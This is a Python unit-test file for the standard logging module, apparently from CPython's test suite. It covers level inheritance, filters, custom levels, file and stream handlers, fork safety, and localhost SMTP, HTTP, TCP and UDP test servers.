# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import signal
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok, assert_python_failure
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
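# BaseTest snapshots the logging module's global state (handlers, handler list, logger dict and
# level name maps) in setUp and restores it in tearDown, so every test starts from an isolated,
# known-clean logging configuration.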
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_get_level_name(self):
"""Test getLevelName returns level constant."""
# NOTE(flaper87): Bug #1517
self.assertEqual(logging.getLevelName('NOTSET'), 0)
self.assertEqual(logging.getLevelName('DEBUG'), 10)
self.assertEqual(logging.getLevelName('INFO'), 20)
self.assertEqual(logging.getLevelName('WARN'), 30)
self.assertEqual(logging.getLevelName('WARNING'), 30)
self.assertEqual(logging.getLevelName('ERROR'), 40)
self.assertEqual(logging.getLevelName('CRITICAL'), 50)
self.assertEqual(logging.getLevelName(0), 'NOTSET')
self.assertEqual(logging.getLevelName(10), 'DEBUG')
self.assertEqual(logging.getLevelName(20), 'INFO')
self.assertEqual(logging.getLevelName(30), 'WARNING')
self.assertEqual(logging.getLevelName(40), 'ERROR')
self.assertEqual(logging.getLevelName(50), 'CRITICAL')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
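# Illustrative sketch (ours; not exercised by the tests below) of how an
# application might register the names above and log at one of the custom
# levels. The helper and logger names here are assumptions made purely for
# illustration.
def _demo_custom_levels(logger_name='demo.custom'):
    for level, name in my_logging_levels.items():
        logging.addLevelName(level, name)
    demo_logger = logging.getLogger(logger_name)
    demo_logger.setLevel(VERBOSE)
    # VERBOSE is 115, so TERSE (118) passes the logger's level check...
    demo_logger.log(TERSE, 'terse message is emitted')
    # ...while CHATTERBOX (112) falls below the threshold and is dropped.
    demo_logger.log(CHATTERBOX, 'chatterbox message is dropped')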
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
                # Not only is 'Garrulous' still missing, but so are 'Sociable'
                # and 'Taciturn'.
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
# The implementation relies on os.register_at_fork existing, but we test
# based on os.fork existing because that is what users and this test use.
# This helps ensure that when fork exists (the important concept) that the
# register_at_fork mechanism is also present and used.
@unittest.skipIf(not hasattr(os, 'fork'), 'Test requires os.fork().')
def test_post_fork_child_no_deadlock(self):
"""Ensure child logging locks are not held; bpo-6721 & bpo-36533."""
class _OurHandler(logging.Handler):
def __init__(self):
super().__init__()
self.sub_handler = logging.StreamHandler(
stream=open('/dev/null', 'wt'))
def emit(self, record):
self.sub_handler.acquire()
try:
self.sub_handler.emit(record)
finally:
self.sub_handler.release()
self.assertEqual(len(logging._handlers), 0)
refed_h = _OurHandler()
self.addCleanup(refed_h.sub_handler.stream.close)
refed_h.name = 'because we need at least one for this test'
self.assertGreater(len(logging._handlers), 0)
self.assertGreater(len(logging._at_fork_reinit_lock_weakset), 1)
test_logger = logging.getLogger('test_post_fork_child_no_deadlock')
test_logger.addHandler(refed_h)
test_logger.setLevel(logging.DEBUG)
locks_held__ready_to_fork = threading.Event()
fork_happened__release_locks_and_end_thread = threading.Event()
def lock_holder_thread_fn():
logging._acquireLock()
try:
refed_h.acquire()
try:
# Tell the main thread to do the fork.
locks_held__ready_to_fork.set()
# If the deadlock bug exists, the fork will happen
# without dealing with the locks we hold, deadlocking
# the child.
# Wait for a successful fork or an unreasonable amount of
# time before releasing our locks. To avoid a timing based
# test we'd need communication from os.fork() as to when it
# has actually happened. Given this is a regression test
# for a fixed issue, potentially less reliably detecting
# regression via timing is acceptable for simplicity.
# The test will always take at least this long. :(
fork_happened__release_locks_and_end_thread.wait(0.5)
finally:
refed_h.release()
finally:
logging._releaseLock()
lock_holder_thread = threading.Thread(
target=lock_holder_thread_fn,
name='test_post_fork_child_no_deadlock lock holder')
lock_holder_thread.start()
locks_held__ready_to_fork.wait()
pid = os.fork()
if pid == 0: # Child.
try:
test_logger.info(r'Child process did not deadlock. \o/')
finally:
os._exit(0)
else: # Parent.
test_logger.info(r'Parent process returned from fork. \o/')
fork_happened__release_locks_and_end_thread.set()
lock_holder_thread.join()
start_time = time.monotonic()
while True:
test_logger.debug('Waiting for child process.')
waited_pid, status = os.waitpid(pid, os.WNOHANG)
if waited_pid == pid:
break # child process exited.
if time.monotonic() - start_time > 7:
break # so long? implies child deadlock.
time.sleep(0.05)
test_logger.debug('Done waiting.')
if waited_pid != pid:
os.kill(pid, signal.SIGKILL)
waited_pid, status = os.waitpid(pid, 0)
self.fail("child process deadlocked.")
self.assertEqual(status, 0, msg="child process error")
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamWithIntName(object):
level = logging.NOTSET
name = 2
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
def test_stream_setting(self):
"""
Test setting the handler's stream
"""
h = logging.StreamHandler()
stream = io.StringIO()
old = h.setStream(stream)
self.assertIs(old, sys.stderr)
actual = h.setStream(old)
self.assertIs(actual, stream)
# test that setting to existing value returns None
actual = h.setStream(old)
self.assertIsNone(actual)
def test_can_represent_stream_with_int_name(self):
h = logging.StreamHandler(StreamWithIntName())
self.assertEqual(repr(h), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
        t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
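            # Any do_GET/do_POST/... attribute lookup is routed to
            # process_request, so one handler body serves every HTTP method
            # the tests exercise.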
            def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to call
                              :meth:`server_bind` and :meth:`server_activate`
                              at some later time before calling :meth:`start`,
                              so that the server will set up the socket and
                              listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
    :param bind_and_activate: If True (the default), binds the server and
                              starts it listening. If False, you need to
                              call :meth:`server_bind` and
                              :meth:`server_activate` at some later time
                              before calling :meth:`start`, so that the
                              server will set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
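# Minimal usage sketch for the server helpers above (ours; not exercised by
# the test suite). It shows the ControlMixin pattern: the server is driven by
# a plain handler callable that runs on the server thread for each request.
def _demo_tcp_server():
    handled = threading.Event()
    received = []
    def handler(request):
        # Called on the server thread for each accepted connection.
        received.append(request.connection.recv(1024))
        handled.set()
    server = TestTCPServer(('localhost', 0), handler, poll_interval=0.1)
    server.start()
    server.ready.wait()
    try:
        with socket.create_connection(('localhost', server.port)) as conn:
            conn.sendall(b'hello')
        handled.wait(2.0)
    finally:
        server.stop(2.0)
    return received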
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
